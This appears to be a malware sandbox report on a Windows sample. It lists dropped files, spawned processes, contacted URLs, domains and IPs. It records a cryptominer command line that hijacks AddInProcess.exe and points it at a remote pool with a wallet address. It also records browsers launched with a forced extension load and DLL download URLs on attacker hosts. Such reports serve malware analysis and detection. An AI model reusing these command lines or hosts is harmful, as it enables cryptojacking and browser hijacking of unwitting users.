C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\en_CA\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\en_GB\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\en_US\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\es\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\es_419\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\et\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\eu\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fa\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fi\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fil\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\fr_CA\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\gl\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\gu\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\hi\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\hr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\hu\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\hy\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\id\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\is\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\it\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\iw\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ja\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ka\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\kk\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\km\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\kn\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ko\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\lo\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\lt\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\lv\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ml\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\mn\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\mr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ms\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\my\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ne\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\nl\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\no\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\pa\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\pl\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\pt_BR\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\pt_PT\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ro\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ru\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\si\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sk\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sl\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sv\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\sw\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ta\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\te\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\th\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\tr\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\uk\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ur\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\vi\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\zh_CN\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\zh_HK\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\zh_TW\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\zu\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_metadata\verified_contents.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\dasherSettingSchema.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\manifest.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\offscreendocument.html
HTML document, ASCII text
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\offscreendocument_main.js
ASCII text, with very long lines (4369)
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\page_embed_script.js
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\service_worker_bin_prod.js
ASCII text, with very long lines (4369)
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\ca9cbf2c-434f-4137-b1d9-fc2e1b91db60.tmp
Google Chrome extension, version 3
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\CRX_INSTALL\_metadata\verified_contents.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\CRX_INSTALL\content.js
Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\CRX_INSTALL\content_new.js
Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\CRX_INSTALL\manifest.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_523394746\e9cd6829-fbd7-41ae-b906-daeaa5ab9731.tmp
Google Chrome extension, version 3
dropped
C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 10:50:01 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 10:48:05 2023, atime=Thu Aug 5 05:45:01 2021, length=3311504, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Tue Oct 3 09:48:42 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
Chrome Cache Entry: 514
ASCII text, with very long lines (1746)
downloaded
Chrome Cache Entry: 515
ASCII text, with very long lines (768)
downloaded
Chrome Cache Entry: 516
ASCII text
downloaded
Chrome Cache Entry: 517
ASCII text, with very long lines (65531)
downloaded
Chrome Cache Entry: 518
ASCII text, with very long lines (3572), with no line terminators
downloaded
Chrome Cache Entry: 519
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 520
ASCII text, with very long lines (2124)
downloaded
Chrome Cache Entry: 521
ASCII text
downloaded
There are 292 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\zlONcFaXkc.exe
"C:\Users\user\Desktop\zlONcFaXkc.exe"
 malicious
C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
 malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
 malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1988,i,7184690276915472336,9481308763283154706,262144 /prefetch:3
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:3
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6956 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
 malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2120,i,14171565827234090732,9899416858446876294,262144 /prefetch:3
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
 malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2028,i,6617554079144185053,3298712530362425133,262144 /prefetch:3
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3028 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
malicious
C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe
"C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,18268589753722857029,6653790801772642783,262144 /prefetch:8
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
There are 16 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://185.196.10.233/dll/ghghghgfg.xml
185.196.10.233
 malicious
https://assets.msn.com/bundles/v1/edgeChromium/latest/common-segments.11aff16404408a58d3d2.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-app-upsell.b15413e73bafe92e0855.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/cs-core-desktop_card-components_dist_card-banner_index_js-cs-core-desktop_card-components_dis-cef191.888669d9cc0659b01a27.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.65258d4f38c7e7963827.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/pill-wc.87e5c35451d51ad2c9c1.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v1.ad1f555a047bcac24a4a.js
23.11.231.163
https://deff.nelreports.net/api/report?cat=msn
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/PowerBI_24x.svg
23.11.231.163
https://aefd.nelreports.net/api/report?cat=bingcsp
unknown
https://deff.nelreports.net/api/report
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneDrive_24x.svg
23.11.231.163
https://docs.google.com/
unknown
https://www.youtube.com
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://deff.nelreports.net/api/report?cat=msnw
unknown
https://www.instagram.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/waterfall-view-feed.da1860afbfeb79eba90c.js
23.11.231.163
https://assets.msn.com/service/v1/news/users/me/locations?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svg
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/superBreakingNews.b103d390df46602376d8.js
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Sway_24x.svg
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.3220005356a33ce0ca94.js
23.11.231.163
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.119ca1abd9fdaf26e071.js
23.11.231.163
https://outlook.office.com/mail/compose?isExtension=true
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://i.y.qq.com/n2/m/index.html
unknown
https://www.deezer.com/
unknown
https://assets.msn.com/staticsb/statics/latest/common/icons/ZoomWhite.svg
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/RewardsCoachmarkData.c462c3980af18bc60b9d.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/codex-bing-chat.d4705abeab944b647de2.js
23.11.231.163
https://web.telegram.org/
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Yammer_24x.svg
23.11.231.163
https://sb.scorecardresearch.com/b2?rn=1713906139242&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=09C025F5A71D6FE2180F319FA60A6E8D&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
3.163.101.92
https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/SunnyDayV3.svg
23.11.231.163
https://stackoverflow.com/q/14436606/23354
unknown
https://assets.msn.com/service/news/feed/pages/weblayout
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_core_dist_interaction-tracker_MouseTracker_js-libs_weather-shared-wc_dist_utilities_entr-072035.11606a415b7b5f44447f.js
23.11.231.163
https://drive-daily-2.corp.google.com/
unknown
https://unitedstates1.ss.wd.microsoft.us/
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-placement-manager.5ea7db000698f8928d23.js
23.11.231.163
http://crl.ver)
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_channel-page-utils_dist_UrlUtilities_js-libs_feed-layout_dist_Utils_js-libs_river-data-t-5c6710.8c7d0e28efea755d336f.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/conditionalBannerWC.6d8019b2ba4ee047b8c5.js
23.11.231.163
https://xmrig.com/wizard
unknown
https://drive-daily-1.corp.google.com/
unknown
https://excel.new?from=EdgeM365Shoreline
unknown
https://drive-daily-5.corp.google.com/
unknown
https://plus.google.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.2a930d83a1ebb2ea4b2d.js
23.11.231.163
https://bzib.nelreports.net/api/report?cat=bingbusiness
23.6.117.16
https://assets.msn.com/statics/icons/favicon_newtabpage.png
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneNote_24x.svg
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/marketmismatch/bannerDisplayString/en-gb.json
23.11.231.163
https://chromewebstore.google.com/
unknown
https://drive-preprod.corp.google.com/
unknown
https://xmrig.com/benchmark/%s
unknown
https://chrome.google.com/webstore/
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v3v4.5873ec4aa566b5d8efc3.js
23.11.231.163
https://bard.google.com/
unknown
http://www.gzip.org/zlib/rfc-gzip.html
unknown
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1713906147886&w=0&anoncknm=app_anon&NoResponseBody=true
104.208.16.92
https://c.msn.com/c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=59892F5548B8410F875CC582C027017F&MUID=09C025F5A71D6FE2180F319FA60A6E8D
20.110.205.119
https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.6cd4b923cfe7c0d8b058.js
23.11.231.163
https://www.office.com
unknown
https://outlook.live.com/mail/0/
unknown
https://tidal.com/
unknown
https://ntp.msn.com
unknown
https://gaana.com/
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/ToDo_24x.svg
23.11.231.163
https://outlook.live.com/mail/compose?isExtension=true
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://c.msn.com/c.gif?rnd=1713906139241&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e77229bad79f43ca83b8b957c0f02b66&activityId=e77229bad79f43ca83b8b957c0f02b66&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0
20.110.205.119
https://files.catbox.moe/k541xr.dllJ
unknown
https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
unknown
https://apis.google.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.6985524dca6d732452d7.js
23.11.231.163
https://domains.google.com/suggest/flow
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/common-feed-libs.1f70b20165d70f57b9b6.js
23.11.231.163
https://latest.web.skype.com/?browsername=edge_canary_shoreline
unknown
https://word.new?from=EdgeM365Shoreline
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.e6fcf9edbaadfb663ccb.js
23.11.231.163
https://assets.msn.com/bundles/v1/edgeChromium/latest/digest-card.7224d7f5906215f25e3c.js
23.11.231.163
http://schemas.microsof.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-data-connector.02a4c4f575b24365379f.js
23.11.231.163
https://mail.google.com/mail/mu/mp/266/#tl/Inbox
unknown
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Visio_24x.svg
23.11.231.163
https://drive-autopush.corp.google.com/
unknown
https://github.com/mgravell/protobuf-net
unknown
https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
unknown
https://open.spotify.com
unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/scrollPerfMetricTrackers.9abeb397be7183994289.js
23.11.231.163
https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Word_24x.svg
23.11.231.163
https://twitter.com/
unknown
https://files.catbox.moe/kwfxr7.dll
unknown
https://m.vk.com/
unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
172.253.124.104
https://xot.traxa41.net/ext/analytic?do=init&from=Chrome3
23.106.238.238
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
gjhfhgdg.insane.wang
185.196.10.233
 malicious
starsmm.org
179.43.170.230
 malicious
bzib.nelreports.net
unknown
 malicious
xot.traxa41.net
unknown
 malicious
fg.microsoft.map.fastly.net
199.232.214.172
chrome.cloudflare-dns.com
172.64.41.3
addons.i7con.net
23.106.238.238
plus.l.google.com
142.250.105.139
www.google.com
172.253.124.104
googlehosted.l.googleusercontent.com
172.253.124.132
clients2.googleusercontent.com
unknown
ntp.msn.com
unknown
apis.google.com
unknown
There are 3 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
192.168.2.4
unknown
unknown
malicious
185.196.10.233
gjhfhgdg.insane.wang
Switzerland
malicious
179.43.170.230
starsmm.org
Panama
malicious
23.6.117.16
unknown
United States
192.168.2.16
unknown
unknown
23.11.231.177
unknown
United States
172.253.124.104
www.google.com
United States
131.253.33.200
unknown
United States
162.159.61.3
unknown
United States
104.208.16.92
unknown
United States
52.159.108.190
unknown
United States
13.107.213.41
unknown
United States
20.110.205.119
unknown
United States
204.79.197.219
unknown
United States
172.64.41.3
chrome.cloudflare-dns.com
United States
172.253.124.132
googlehosted.l.googleusercontent.com
United States
23.0.175.178
unknown
United States
13.107.21.237
unknown
United States
23.0.175.195
unknown
United States
23.106.238.238
